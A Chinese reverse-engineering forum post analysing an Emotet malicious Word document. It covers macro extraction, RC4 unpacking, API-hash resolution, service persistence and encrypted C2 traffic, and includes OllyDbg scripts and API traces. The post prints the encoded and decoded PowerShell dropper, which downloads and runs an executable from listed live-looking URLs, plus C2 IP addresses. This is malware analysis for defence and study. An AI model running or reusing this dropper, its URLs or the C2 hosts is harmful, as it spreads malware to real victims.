首页
论坛
课程
招聘
[原创]Emotet病毒分析
2020-9-21 11:00 2431

[原创]Emotet病毒分析

2020-9-21 11:00
2431

emmmm,刚入门的小白一个和VirtualCC一起分析了这个病毒,最近也是突然又爆发的一个病毒

Emotet

样本:PO# 09012020Ex.doc

 

流程:

获取了文档

打开宏恶意代码应该开始执行了,alt+f11

调试提取一下powershell

1
2
3
4
5
dim y
 
y = Join(x,"")
 
debug.print x
1
powersheLL -e JABZAHgAeABuAGkAZgAwAD0AKAAnAEMAJwArACgAJwA2ACcAKwAnAGQAbQBiAGYAJwApACsAJwA4ACcAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAdQBzAEUAUgBQAFIATwBmAEkAbABFAFwAeQBlAEQAegBiAHEANQBcAFAARgAyAHEAUAAyAFUAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAFIARQBjAFQATwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAEMAVQByAEkAVAB5AGAAUABSAE8AYABUAGAATwBjAG8ATAAiACAAPQAgACgAJwB0ACcAKwAnAGwAcwAnACsAKAAnADEAJwArACcAMgAnACsAJwAsACAAdABsAHMAMQAxACwAIAB0AGwAJwApACsAJwBzACcAKQA7ACQAUwB2AHkAawBqAHUAcgAgAD0AIAAoACcASgAnACsAKAAnADMAJwArACcAcwBhACcAKQArACcAdAAnACsAKAAnADgAbgAnACsAJwB4AGEAJwApACkAOwAkAE4AYQBlADUAcwBfAGEAPQAoACcASQAnACsAKAAnAHgAOAAnACsAJwBkADUAJwApACsAJwA0AGYAJwApADsAJABDADUAagBlAGYANgBrAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAFoAJwArACgAJwBLACcAKwAnAHYAWQBlACcAKwAnAGQAegBiACcAKQArACgAJwBxADUAWgBLAHYAUAAnACsAJwBmACcAKwAnADIAJwApACsAKAAnAHEAcAAyAHUAJwArACcAWgAnACkAKwAnAEsAdgAnACkALgAiAFIARQBgAFAATABBAGAAQwBFACIAKAAoACcAWgBLACcAKwAnAHYAJwApACwAWwBTAFQAcgBpAG4ARwBdAFsAYwBIAEEAUgBdADkAMgApACkAKwAkAFMAdgB5AGsAagB1AHIAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABQAGgAbgByADgAcQBqAD0AKAAnAEMAJwArACgAJwB5AGkAdQByAGIAJwArACcAagAnACkAKQA7ACQAUAB1AGIAMQBoAHIAagA9ACYAKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBFAHQALgB3AGUAQgBDAEwASQBlAE4AdAA7ACQATwBuADQANAA5ADEAcAA9ACgAKAAnAGgAdAAnACsAJwB0AHAAJwApACsAKAAnADoALwAnACsAJwAvAHYAJwApACsAJwBpACcAKwAoACcAZAByAGkAbwBkACcAKwAnAGUAYwAnACsAJwBvAHIAJwApACsAJwBhACcAKwAoACcAYwAnACsAJwBpAG8AJwApACsAKAAnAG4AJwArACcALgBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACgAJwB3AHAALQBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuAC8ATQAnACsAJwBJACcAKQArACcASAAvACcAKwAnACoAJwArACgAJwBoAHQAdAAnACsAJwBwADoALwAnACkAKwAnAC8AdgAnACsAKAAnAGEAJwArACcAbgBiACcAKQArACgAJwByAGEAcwAnACsAJwB0ACcAKQArACgAJwAuAGMAbwAnACsAJwBtACcAKQArACcALwAnACsAJwBiACcAKwAnAGwAJwArACcAZQAnACsAKAAnAGUAYwBoAC8AZgBSACcAKwAnAC8AJwApACsAJwAqACcAKwAoACcAaAB0AHQAcAAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgAnACsAJwBhAHIAaQB2AG8AJwArACcAZABhAC4AJwApACsAJwBjAG8AJwArACcAbQAnACsAJwAvACcAKwAoACcAYwBnACcAKwAnAGkAJwApACsAKAAnAC0AJwArACcAYgAnACsAJwBpAG4ALwA4ADkAJwApACsAJwA3AC8AJwArACgAJwAqACcAKwAnAGgAdAAnACkAKwAoACcAdABwACcAKwAnADoALwAvACcAKwAnAHcAJwApACsAKAAnAGEAawAnACsAJwBhAG4AJwApACsAKAAnAC0AdAAnACsAJwBhAG4AawAnACkAKwAoACcAYQAuACcAKwAnAG8AcgBnAC8AJwApACsAKAAnAEsAbAAnACsAJwBlAGkAJwApACsAKAAnAG4AdAAnACsAJwBlACcAKwAnAGkAbABlAC8ARQAnACsAJwAvACoAaAB0AHQAcAAnACkAKwAoACcAcwA6AC8ALwB3ACcAKwAnAHcAdwAuAHcAZQBiAGgAbwAnACsAJwBzAHQANAAnACsAJwBjACcAKwAnAGgAJwArACcAcgBpAHMAdAAnACsAJwAuACcAKQArACcAbwAnACsAJwByAGcAJwArACgAJwAvACcAKwAnAEwAQQAnACkAKwAnAE0AJwArACcAQgAvACcAKwAoACcARAAvACoAJwArACcAaAB0ACcAKQArACgAJwB0ACcAKwAnAHAAOgAvAC8AdwBoACcAKQArACgAJwBpACcAKwAnAHQAZQAtAG8AJwApACsAKAAnAG4ALQByACcAKwAnAGkAYwAnACsAJwBlAC4AJwApACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AJwApACsAJwBMACcAKwAnAG8AJwArACgAJwBnACcAKwAnAG8AcwAvACcAKwAnAFUALwAnACkAKwAnACoAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQArACgAJwA6AC8ALwB6AGEAaAAnACsAJwBuACcAKwAnAGEAJwArACcAcgB6AHQAJwApACsAKAAnAC0AZgAnACsAJwBsAGUAJwApACsAJwBuACcAKwAoACcAcwBiACcAKwAnAHUAJwApACsAJwByACcAKwAoACcAZwAnACsAJwAuAGMAbwBtACcAKQArACcALwAnACsAKAAnAGMAZwAnACsAJwBpAC0AYgAnACsAJwBpAG4ALwAnACkAKwAoACcATAAnACsAJwA4AC8AJwApACkALgAiAHMAUABMAGAAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASgA4AHcAMAB1AGoAbQA9ACgAJwBJACcAKwAoACcAbgAnACsAJwA1AGoAZAAnACkAKwAnAGoAMAAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABOADUANQBxAGUAeAB2ACAAaQBuACAAJABPAG4ANAA0ADkAMQBwACkAewB0AHIAeQB7ACQAUAB1AGIAMQBoAHIAagAuACIAZABPAFcATgBMAGAAbwBhAEQARgBJAGAATABFACIAKAAkAE4ANQA1AHEAZQB4AHYALAAgACQAQwA1AGoAZQBmADYAawApADsAJABXAGQAbABnAGsAdQBwAD0AKAAoACcAVABtACcAKwAnADIAJwApACsAJwA2ACcAKwAoACcAMgAnACsAJwBxAGgAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQAQwA1AGoAZQBmADYAawApAC4AIgBsAEUAYABOAGcAYABUAGgAIgAgAC0AZwBlACAAMgA1ADIAOAA1ACkAIAB7AC4AKAAnAEkAbgB2AG8AawAnACsAJwBlAC0ASQB0AGUAJwArACcAbQAnACkAKAAkAEMANQBqAGUAZgA2AGsAKQA7ACQAVwAyADkAaABnADYAbgA9ACgAKAAnAEcAZQB0AHcAJwArACcAXwAnACkAKwAnAHkANgAnACkAOwBiAHIAZQBhAGsAOwAkAE4AegBuADIAZAAyADQAPQAoACcATgAnACsAKAAnAGgAaQBzACcAKwAnAHIAJwApACsAJwBuADcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABPADgAaABzAGEAdAB5AD0AKAAnAFkAJwArACcAbQAnACsAKAAnAGIAcAA4AHIAJwArACcAMwAnACkAKQA=

-e表示它接受命令的base64编码的字符串版本

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
$Yxxnif0=(C6dmbf8);
&(new-item) $env:usERPROfIlE\yeDzbq5\PF2qP2U\ -itemtype diREcTORy;
[Net.ServicePointManager]::"SeCUrITyPROTOcoL" = (tls12, tls11, tls);
$Svykjur = (J3sat8nxa);
$Nae5s_a=(Ix8d54f);
$C5jef6k=$env:userprofile(ZKv Yedzbq5 ZKv Pf2qp2u ZKv."REPLACE"ZKv,[STrinG][cHAR]92)$Svykjur.exe;
$Phnr8qj=(Cyiurbj);
$Pub1hrj=&(new-object) NEt.weBCLIeNt;
$On4491p= http://vidriodecoracion.com/wp-admin/MIH/*
          http://vanbrast.com/bleech/fR/*
                    http://varivoda.com/cgi-bin/897/*
                    http://wakan-tanka.org/Kleinteile/E/*
                    https://www.webhost4christ.org/LAMB/D/*
                    http://white-on-rice.com/Logos/U/*
                    http://zahnarzt-flensburg.com/cgi-bin/L8/."sPLit"[char]42;
$J8w.ujm=(In5jdj.);
foreach($N55qexv in $On4491p)
{
  try{
    $Pub1hrj."dOWNLoaDFILE"($N55qexv, $C5jef6k);
$Wdlgkup=(Tm262qh);
If ((&Get-Item $C5jef6k)."lENgTh" -ge 25285)
{.(Invoke-Item)($C5jef6k);
 $W29hg6n=(Getw_y6);
break;
$Nzn2d24=(N(hisr)n7)
}
  }
  catch{}
}
$O8hsaty=(Ym(bp8r3))

变量On4491p是我们的URL列表

1
2
3
4
5
6
7
http://vidriodecoracion.com/wp-admin/MIH/
http://vanbrast.com/bleech/fR/
http://varivoda.com/cgi-bin/897/
http://wakan-tanka.org/Kleinteile/E/
https://www.webhost4christ.org/LAMB/D/
http://white-on-rice.com/Logos/U/
http://zahnarzt-flensburg.com/cgi-bin/L8/

邮件中下载的一个附件,样本通过virtual alloc下断可以看到对内存的一个操作

flprotect 是0x40

可读可写

发现通过一个类似于RC4的动态解密第一次

把动态解密的

2048个,解密出来的东西dump出来,再次放入ida中
标准的RC4解密

 

这次还会进行动态解密,但是解密出来的结果中有一个PE文件,直接DUMP出来了

 

可以看到没有导入表

 

 

这里运用了hash值,shellcode的一个手段,这样就很难去看出来api是什么,在sub_40481D之间运用了平坦化大量的switch case来干扰我们的判断,类似于ollvm的平坦化,但是OD中有ODScript脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
//FIND eip,#FFD683c4148BCDE8#
//CMP $RESULT,0
//JE exit
//STI
VAR tmpAddr
VAR tmp
VAR para1
VAR para2
VAR para3
VAR apiName
VAR addr
BP 410528
RUN
STI
FIND eip,#FF55D48945D0B801000000#
CMP $RESULT,0
JE exit
BP $RESULT
RUN
STI
FIND eip,#FFD58B77548BD88B44245C#
BP $RESULT
RUN
STO
MOV tmpAddr,eax
MOV tmp,eax
 
FIND eip,#FFD6837C246000747C#
CMP $RESULT,0
JE exit
BP $RESULT
RUN
STI
 
loop:
FIND tmpAddr,#E8????FFFF59FFD0#
CMP $RESULT,0
JE exit
BP $RESULT
MOV tmpAddr,$RESULT
ADD tmpAddr,4
JMP loop
 
exit:
FIND tmp,#E83CFFFFFF59FFD0#
BC $RESULT
FIND tmp,#E821FFFFFF59FFD0#
BC $RESULT
FIND tmp,#E81AFDFFFF3529E15B09#
MOV addr,$RESULT
BP $RESULT
RUN
COB
MOV tmpAddr,0
 
Loop1:
CMP tmpAddr,0
JNE HasInit
MOV tmpAddr,eip
HasInit:
STI
RUN
COB
Find:
// 暂存api函数名字
LEN [ecx]
MOV apiName,[ecx],$RESULT
STO
STO
STO
CMP !ZF,1
// 如果相等那么写入文件
JE Write
RUN
COB
JMP Find
Write:
WRTA "HASH.TXT",tmpAddr
WRTA "HASH.TXT",apiName
MOV tmpAddr,0
RUN
COB
JMP Loop1
 
MSG "参数获取完毕"
ret
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
VAR tmpAddr
VAR tmp
VAR para1
VAR para2
VAR para3
BP 410528
RUN
STI
FIND eip,#FF55D48945D0B801000000#
CMP $RESULT,0
JE exit
BP $RESULT
RUN
STI
FIND eip,#FFD58B77548BD88B44245C#
BP $RESULT
RUN
STO
MOV tmpAddr,eax
MOV tmp,eax
 
FIND eip,#FFD6837C246000747C#
CMP $RESULT,0
JE exit
BP $RESULT
RUN
STI
 
loop:
FIND tmpAddr,#E8????FFFF59FFD0#
CMP $RESULT,0
JE exit
BP $RESULT
MOV tmpAddr,$RESULT
ADD tmpAddr,4
JMP loop
 
exit:
FIND tmp,#E83CFFFFFF59FFD0#
BC $RESULT
FIND tmp,#E821FFFFFF59FFD0#
BC $RESULT
//RUN
//COB
//Loop1:
//MOV tmpAddr,eip
//STI
//MOV para3,[esp+4]
//MOV para2,ecx
//MOV para1,edx
//WRTA "HASH.TXT",tmpAddr
//WRTA "HASH.TXT",para1
//WRTA "HASH.TXT","\r\n"
//WRTA "HASH.TXT",para2
//WRTA "HASH.TXT","\r\n"
//WRTA "HASH.TXT",para3
 
//RUN
//COB
//JMP Loop1
 
MSG "脚本执行完毕"
ret

 

看这些api应该就知道了所有的一个流程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
402E20
GetProcessHeap
402E20
GetProfileSectionW
402E20
HeapAlloc
402E20
GetModuleHandleA
402E20
RtlAllocateHeap
404FFD
LoadLibraryW
402F9F
HeapFree
402FBF
HeapFree
402F9F
GetProcessHeap
404FFD
crypt32.dll
404FFD
shell32.dll
404FFD
urlmon.dll
404FFD
userenv.dll
404FFD
wtsapi32.dll
404FFD
wininet.dll
406950
OpenSCManagerW
4069E5
CloseServiceHandle
4069BE
SHGetFolderPathW
405791
GetModuleFileNameW
4057B4
PathSkipRootW
405765
PathFindExtensionW
4057F6
lstrcpynW
406900
GetModuleFileNameW
402E20
_snwprintf
402F9F
GetProcessHeap
402E20
FindFirstFileW
402E20
FindNextFileW
402E20
FindClose
40664C
GetCommandLineW
406530
CommandLineToArgvW
406607
LocalFree
405B92
GetModuleFileNameW
405C0B
CreateFileW
405BB6
GetFileInformationByHandleEx
405BDE
CloseHandle
405C42
GetSystemTimeAsFileTime
4062CC
OpenServiceW
406263
CloseServiceHandle
40640C
GetTickCount
4063C7
lstrcpyW
4063DC
lstrlenW
4064AE
lstrlenW
4067F3
GetTickCount
40680B
GetCurrentProcessId
402F7C
memset
402F7C
memset
402E20
SHFileOperationW
4060FD
GetModuleFileNameW
402F7C
memset
402F7C
memset
402E20
DeleteFileW
405ADE
GetSystemTimeAsFileTime
405A3C
CreateFileW
405A06
SetFileInformationByHandle
405FEF
OpenSCManagerW
405EE7
CreateServiceW
4039AA
EnumServicesStatusExW
403A9d
QueryServiceConfig2W
403957
ChangeServiceConfig2W
402F9F
 
406014
WaitForSingleObject
405CD0
 
402F7C
CreateProcessW
4035E0
ExitProcess

我们回到原来的dump文件看看都干什么了一个流程:

 

申请我们拉伸后的空间:

 

 

入口点:

 

 

 

那么在这里开始执行我们的一个操作:
一般通过hash值加密的,可以直接动调去看,返回值在EAX中,我们直接动态调试

 



 

拷贝了可执行程序到C:\Windows\SysWOW64下,文件夹和文件都是随机的,两个文件是一样的

 

 

把我们的当前的exe注册为服务,启动类型自动保持exe一直存在,对应OD就是:(因为再次测试的时候会跟之前的有些不同,所以图片对不上名字)

 

 

 

调试服务(方法):

 

找了很多帖子方法,找到了怎么调试服务记录一下,方便以后去用 https://bbs.pediy.com/thread-229643.htm

 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options

 

 

修改启动服务时间

 

 

在原来的exe跑ODScript

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
VAR tmpAddr
VAR tmp
VAR para1
VAR para2
VAR para3
BP 410528
RUN
STI
FIND eip,#FF55D48945D0B801000000#
CMP $RESULT,0
JE exit
BP $RESULT
RUN
STI
FIND eip,#FFD58B77548BD88B44245C#
BP $RESULT
RUN
STO
MOV tmpAddr,eax
MOV tmp,eax
 
FIND eip,#FFD6837C246000747C#
CMP $RESULT,0
JE exit
BP $RESULT
RUN
STI
 
loop:
FIND tmpAddr,#E8????????59FFD0#
CMP $RESULT,0
JE exit
BP $RESULT
MOV tmpAddr,$RESULT
ADD tmpAddr,4
JMP loop
 
exit:
FIND tmp,#E83CFFFFFF59FFD0#
BC $RESULT
FIND tmp,#E821FFFFFF59FFD0#
BC $RESULT
//RUN
//COB
//Loop1:
//MOV tmpAddr,eip
//STI
//MOV para3,[esp+4]
//MOV para2,ecx
//MOV para1,edx
//WRTA "HASH.TXT",tmpAddr
//WRTA "HASH.TXT",para1
//WRTA "HASH.TXT","\r\n"
//WRTA "HASH.TXT",para2
//WRTA "HASH.TXT","\r\n"
//WRTA "HASH.TXT",para3
 
//RUN
//COB
//JMP Loop1
 
MSG "脚本执行完毕"
ret
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
//FIND eip,#FFD683c4148BCDE8#
//CMP $RESULT,0
//JE exit
//STI
VAR tmpAddr
VAR tmp
VAR para1
VAR para2
VAR para3
VAR apiName
VAR addr
BP 410528
RUN
STI
FIND eip,#FF55D48945D0B801000000#
CMP $RESULT,0
JE exit
BP $RESULT
RUN
STI
FIND eip,#FFD58B77548BD88B44245C#
BP $RESULT
RUN
STO
MOV tmpAddr,eax
MOV tmp,eax
 
FIND eip,#FFD6837C246000747C#
CMP $RESULT,0
JE exit
BP $RESULT
RUN
STI
 
loop:
FIND tmpAddr,#E8????????59FFD0#
CMP $RESULT,0
JE exit
MOV tmpAddr,$RESULT
ADD tmpAddr,6
BP tmpAddr
JMP loop
 
exit:
//FIND tmp,#E83CFFFFFF59FFD0#
//MOV tmpAddr,$RESULT
//ADD tmpAddr,6
//BC tmpAddr
//FIND tmp,#E821FFFFFF59FFD0#
//MOV tmpAddr,$RESULT
//ADD tmpAddr,6
//BC tmpAddr
//FIND tmp,#E85F09000059FFD0#
//MOV tmpAddr,$RESULT
//ADD tmpAddr,6
//BC tmpAddr
//FIND tmp,#E81F09000059FFD0#
//MOV tmpAddr,$RESULT
//ADD tmpAddr,6
//BC tmpAddr
//FIND tmp,#E87A05000059FFD0#
//MOV tmpAddr,$RESULT
//ADD tmpAddr,6
//BC tmpAddr
 
RUN
COB
 
LOOP2:
BC eip
LOG eax
RUN
COB
jmp LOOP2
 
MSG "参数获取完毕"
ret

查看到HTTP相关服务的API:

 


 

我们request时候线程的停止需要我们激活所有的线程

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
0x622FFA     eax: 76EB14E9 | kernel32.GetProcessHeap
0x622EED     eax: 76EB1245 | kernel32.GetModuleHandleA
0x623015     eax: 777BE026 | ntdll_1.RtlAllocateHeap
0x625003     eax: 76EB492B | kernel32.LoadLibraryW
0x622FA5     eax: 76EB14E9 | kernel32.GetProcessHeap
0x622FC0     eax: 76EB14C9 | kernel32.HeapFree
0x626956     eax: 753ACA64 | advapi32.OpenSCManagerW
0x6269EB     eax: 753B369C | advapi32.CloseServiceHandle
0x6269C4     eax: 76245708 | shell32.SHGetFolderPathW
0x625797     eax: 76EB4950 | kernel32.GetModuleFileNameW
0x6257BA     eax: 7735FBF5 | shlwapi.PathSkipRootW
0x62576B     eax: 7734A1B9 | shlwapi.PathFindExtensionW
0x6257FC     eax: 76EDD556 | kernel32.lstrcpynW
0x626906     eax: 76EB4950 | kernel32.GetModuleFileNameW
0x626A55     eax: 76245708 | shell32.SHGetFolderPathW
0x6229FE     eax: 777C2417 | ntdll_1._snwprintf
0x622A36     eax: 76EB4435 | kernel32.FindFirstFileW
0x6229BC     eax: 76EB54EE | kernel32.FindNextFileW
0x6225D7     eax: 7734A1B9 | shlwapi.PathFindExtensionW
0x622617     eax: 76EDD556 | kernel32.lstrcpynW
0x622B1F     eax: 76EB4442 | kernel32.FindClose
0x626652     eax: 76EB5223 | kernel32.GetCommandLineW
0x626536     eax: 761D9EE8 | shell32.CommandLineToArgvW
0x62660D     eax: 76EB2D3C | kernel32.LocalFree
0x625B98     eax: 76EB4950 | kernel32.GetModuleFileNameW
0x625C11     eax: 76EB3F5C | kernel32.CreateFileW
0x625BBC     eax: 76ECC78F | kernel32.GetFileInformationByHandleEx
0x625BE4     eax: 76EB1410 | kernel32.CloseHandle
0x625C48     eax: 76EB3509 | kernel32.GetSystemTimeAsFileTime
0x6236DF     eax: 76ED735F | kernel32.CreateToolhelp32Snapshot
0x62369D     eax: 76ED8BAF | kernel32.Process32FirstW
0x623367     eax: 76EB11F8 | kernel32.GetCurrentProcessId
0x623737     eax: 76EB1410 | kernel32.CloseHandle
0x6232B1     eax: 76EB1986 | kernel32.OpenProcess
0x6232D3     eax: 76EC15F7 | kernel32.QueryFullProcessImageNameW
0x6232EA     eax: 76EB1410 | kernel32.CloseHandle
0x6266F9     eax: 7734BB71 | shlwapi.PathFindFileNameW
0x626D61     eax: 76EB183E | kernel32.CreateEventW
0x626DA7     eax: 76EB34D5 | kernel32.CreateThread
0x626AF5     eax: 76EB4950 | kernel32.GetModuleFileNameW
0x626B11     eax: 7734BB71 | shlwapi.PathFindFileNameW
0x624AA5     eax: 76ECEEE0 | kernel32.GetTickCount64
0x626B3D     eax: 76ECD851 | kernel32.FindFirstChangeNotificationW
0x624C84     eax: 76EB110C | kernel32.GetTickCount
0x626C89     eax: 76EB4950 | kernel32.GetModuleFileNameW
0x626CB8     eax: 76EB1809 | kernel32.GetCurrentProcess
0x626CCD     eax: 76EC15F7 | kernel32.QueryFullProcessImageNameW
0x626DEC     eax: 76EB1136 | kernel32.WaitForSingleObject
0x626CF8     eax: 76ECD5CD | kernel32.lstrcmpiW
0x626BA2     eax: 76EB4220 | kernel32.WaitForMultipleObjects
0x624CD2     eax: 76ECEEE0 | kernel32.GetTickCount64
0x621E8E     eax: 753ADF14 | advapi32.CryptAcquireContextW
0x622027     eax: 7569D718 | crypt32.CryptDecodeObjectEx
0x621ECA     eax: 753AC532 | advapi32.CryptImportKey
0x621EF5     eax: 76EB2D3C | kernel32.LocalFree
0x621F3D     eax: 753A8EE9 | advapi32.CryptGenKey
0x621FC0     eax: 753ADF4E | advapi32.CryptCreateHash
0x624B9C     eax: 76EB110C | kernel32.GetTickCount
0x624BD5     eax: 76ECEEE0 | kernel32.GetTickCount64
0x624550     eax: 76ECB6E0 | kernel32.GetComputerNameA
0x623C1C     eax: 76EB43E2 | kernel32.GetWindowsDirectoryW
0x623C6D     eax: 76ECC860 | kernel32.GetVolumeInformationW
0x624510     eax: 77864760 | ntdll_1._snprintf
0x6249C1     eax: 76EB5A4B | kernel32.lstrlenA
0x623B98     eax: 777C873A | ntdll_1.RtlGetVersion
0x623B5F     eax: 76EC10B5 | kernel32.GetNativeSystemInfo
0x623315     eax: 76EB11F8 | kernel32.GetCurrentProcessId
0x62332D     eax: 76EB1275 | kernel32.ProcessIdToSessionId
0x62478D     eax: 76EB11F8 | kernel32.GetCurrentProcessId
0x6247F2     eax: 76ED3102 | kernel32.lstrcpyW
0x624664     eax: 76EB1700 | kernel32.lstrlenW
0x6246D2     eax: 76ED3102 | kernel32.lstrcpyW
0x6246EA     eax: 76EB1700 | kernel32.lstrlenW
0x623CF5     eax: 76EB170D | kernel32.WideCharToMultiByte
0x623D2B     eax: 76EB170D | kernel32.WideCharToMultiByte
0x622FDF     eax: 777B2340 | ntdll_1.memcpy
0x621644     eax: 76EB110C | kernel32.GetTickCount
0x621C4A     eax: 753E3198 | advapi32.CryptDuplicateHash
0x621C0C     eax: 753C779B | advapi32.CryptEncrypt
0x621CE1     eax: 753A91EA | advapi32.CryptExportKey
0x621D81     eax: 753ADF7E | advapi32.CryptGetHashParam
0x621DB9     eax: 753ADF66 | advapi32.CryptDestroyHash
0x6214B6     eax: 777C2417 | ntdll_1._snwprintf
0x623761     eax: 777D01E3 | ntdll_1.RtlRandomEx
0x621350     eax: 76EB110C | kernel32.GetTickCount
0x621389     eax: 76EB110C | kernel32.GetTickCount
0x6213B6     eax: 777C2417 | ntdll_1._snwprintf
0x6215F9     eax: 777C2417 | ntdll_1._snwprintf
0x621822     eax: 76EB110C | kernel32.GetTickCount
0x6217F1     eax: 77864760 | ntdll_1._snprintf
0x62175D     eax: 77864760 | ntdll_1._snprintf
0x622290     eax: 75E01D76 | urlmon.ObtainUserAgentString
0x623DB3     eax: 76EB192E | kernel32.MultiByteToWideChar
0x623DDE     eax: 76EB192E | kernel32.MultiByteToWideChar
0x62223A     eax: 77259197 | wininet.InternetOpenW
0x6223DF     eax: 7725492C | wininet.InternetConnectW
0x622316     eax: 77254A42 | wininet.HttpOpenRequestW
0x62236A     eax: 7725BA12 | wininet.HttpSendRequestW
0x622171     eax: 77255C75 | wininet.HttpQueryInfoW
0x6222CC     eax: 7724AB49 | wininet.InternetCloseHandle
0x62243A     eax: 7724AB49 | wininet.InternetCloseHandle
0x62245F     eax: 7724AB49 | wininet.InternetCloseHandle
0x624F3A     eax: 76EB110C | kernel32.GetTickCount
0x624F73     eax: 76ECEEE0 | kernel32.GetTickCount64
0x622109     eax: 7724B406 | wininet.InternetReadFile
0x621AC3     eax: 753E3198 | advapi32.CryptDuplicateHash
0x621B4B     eax: 753E3178 | advapi32.CryptDecrypt
0x621B0A     eax: 753AC54A | advapi32.CryptVerifySignatureW
0x621A70     eax: 753ADF66 | advapi32.CryptDestroyHash
0x624EB2     eax: 76EB110C | kernel32.GetTickCount
0x624EEB     eax: 76ECEEE0 | kernel32.GetTickCount64
0x6258C6     eax: 777C2417 | ntdll_1._snwprintf
0x62587E     eax: 7734BB71 | shlwapi.PathFindFileNameW
0x626308     eax: 753ACA64 | advapi32.OpenSCManagerW
0x6262D2     eax: 753ACA4C | advapi32.OpenServiceW
0x626269     eax: 753B369C | advapi32.CloseServiceHandle
0x625DB6     eax: 777C2417 | ntdll_1._snwprintf
0x625DEB     eax: 76ECD4DC | kernel32.GetTempPathW
0x625E0F     eax: 76EDD1B6 | kernel32.GetTempFileNameW
0x622F82     eax: 777BDF20 | ntdll_1.memset
0x6228DD     eax: 76ED3102 | kernel32.lstrcpyW
0x6228F3     eax: 76ED3102 | kernel32.lstrcpyW
0x622934     eax: 762196F6 | shell32.SHFileOperationW
0x625D45     eax: 7734BB71 | shlwapi.PathFindFileNameW
0x625D69     eax: 76F344CF | kernel32.RemoveDirectoryW
0x6241A6     eax: 76EB7A10 | kernel32.ExitProcess

了解了流程之后,我们看一下encrypt传了什么,可以看到传了本机的用户名,以及文件的信息,到服务器端

 

 


使用了RSA和AES算法上传到服务器

 

 

 

 

 

 

InternetReadFile:

 

 

同样他会下载东西到本机里,这里可能C2服务器已经失效,文件的大小是0

 

 

C2服务器 通过硬编码的方式,和C2服务器进行交互:

 

 

C2 服务器地址:

1
2
3
4
5
6
7
8
216.10.40.16
91.121.54.71
209.236.123.42
77.55.211.77
85.105.140.135
138.97.60.141
217.13.106.14
190.2.31.172

挖华为终端产品漏洞赢巨额奖金! 注明看雪会员还有额外奖励!!

收藏
点赞4
打赏
分享
最新回复 (13)
雪    币: 18866
活跃值: 活跃值 (1266)
能力值: (RANK:382 )
在线值:
发帖
回帖
粉丝
顾何 活跃值 7 2020-9-21 11:10
2
0
感谢分享~  这应该是Emotet比较新的版本,上周我这边也看到了很多相同结构的,比较活跃。
分析的很详细,支持一下~
顺便,如果方便,下次可以将分析的样本打包上传到论坛,提供给想学习的读者练习。
雪    币: 1558
活跃值: 活跃值 (1033)
能力值: ( LV6,RANK:87 )
在线值:
发帖
回帖
粉丝
L0x1c 活跃值 1 2020-9-21 11:27
3
0
顾何 感谢分享~ 这应该是Emotet比较新的版本,上周我这边也看到了很多相同结构的,比较活跃。 分析的很详细,支持一下~ 顺便,如果方便,下次可以将分析的样本打包上传到论坛,提供给想学习的读者练习。 ...
谢谢
雪    币: 1558
活跃值: 活跃值 (1033)
能力值: ( LV6,RANK:87 )
在线值:
发帖
回帖
粉丝
L0x1c 活跃值 1 2020-9-21 11:27
4
0
